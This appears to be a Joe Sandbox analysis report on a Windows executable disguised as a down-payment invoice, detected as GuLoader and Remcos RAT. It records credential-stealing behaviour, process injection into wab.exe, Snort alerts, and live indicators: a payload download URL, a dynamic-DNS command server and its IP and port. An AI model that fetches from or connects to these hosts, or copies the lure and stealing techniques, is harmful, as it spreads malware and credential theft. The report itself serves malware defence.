Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
18001787_down_payment_invoice_90002104.exe

Overview

General Information

Sample Name:18001787_down_payment_invoice_90002104.exe
Analysis ID:1334833
MD5:195787f942427352db785fea42c93f43
SHA1:11349f0aa5059663c99bddb4b1d4925b0795d4c0
SHA256:4957fb0faa66fa85bd02e198c98d741a6edf5f683538601bbc7099f88aa4ac30
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to steal Mail credentials (via file registry)
Contains functionality to modify clipboard data
Yara detected WebBrowserPassView password recovery tool
Uses dynamic DNS services
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • 18001787_down_payment_invoice_90002104.exe (PID: 3312 cmdline: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe MD5: 195787F942427352DB785FEA42C93F43)
    • wab.exe (PID: 1392 cmdline: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 6416 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ixfof MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 3152 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\szlggikjo MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 6492 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\utqzgbudcvrn MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\paqlgkfs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.40188235622.0000000000690000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
      00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000007.00000002.45046073128.0000000003AF9000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            00000003.00000002.40189422367.0000000003F89000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 4 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:192.168.11.2094.156.6.2535007724022032776 10/31/23-13:20:00.651244
              SID:2032776
              Source Port:50077
              Destination Port:2402
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:94.156.6.253192.168.11.202402500772032777 10/31/23-13:26:11.604235
              SID:2032777
              Source Port:2402
              Destination Port:50077
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.11.20217.147.225.6950076802855192 10/31/23-13:19:57.803142
              SID:2855192
              Source Port:50076
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: 18001787_down_payment_invoice_90002104.exeVirustotal: Detection: 11%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1392, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Antivirus detection for URL or domain
              Source: http://gudanidevelopment.ge/IogvoayYhe139.binSchoSvltathirchimie.com/IogvoayYhe139.binAvira URL Cloud: Label: malware
              Multi AV Scanner detection for domain / URL
              Source: gudanidevelopment.geVirustotal: Detection: 17%Perma Link
              Source: ourt2949aslumes9.duckdns.orgVirustotal: Detection: 13%Perma Link
              Source: 18001787_down_payment_invoice_90002104.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 18001787_down_payment_invoice_90002104.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_0040672B FindFirstFileW,FindClose,3_2_0040672B
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405AFA
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_356310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_356310F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_35636580 FindFirstFileExA,7_2_35636580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040AE51 FindFirstFileW,FindNextFileW,9_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407898

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.20:50076 -> 217.147.225.69:80
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.11.20:50077 -> 94.156.6.253:2402
              Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 94.156.6.253:2402 -> 192.168.11.20:50077
              Uses dynamic DNS services
              Source: unknownDNS query: name: ourt2949aslumes9.duckdns.org
              Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
              Source: Joe Sandbox ViewASN Name: GRENA-ASTbilisiGeorgiaGE GRENA-ASTbilisiGeorgiaGE
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 94.156.6.253 94.156.6.253
              Source: global trafficHTTP traffic detected: GET /IogvoayYhe139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: gudanidevelopment.geCache-Control: no-cache
              Source: global trafficTCP traffic: 192.168.11.20:50077 -> 94.156.6.253:2402
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: wab.exe, 00000007.00000002.45066782478.0000000035600000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, 00000009.00000003.40247422659.00000000046B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_o
              Source: wab.exe, 00000009.00000003.40247422659.00000000046B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_o
              Source: wab.exe, 00000009.00000003.40248364770.00000000046B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: e","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}]
              Source: wab.exe, 00000009.00000003.40248364770.00000000046B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: e","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}]
              Source: wab.exe, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000009.00000002.40254477336.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251675749.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251931887.00000000046A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 00000009.00000002.40254477336.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251675749.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251931887.00000000046A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 00000009.00000003.40247633831.00000000046A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: u"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}fre{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"}hardware_acceleration_mode_previoustrueis_dsp_recommendedtruelegacy{"profile":{"name":{"migrated":true}}}migration{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 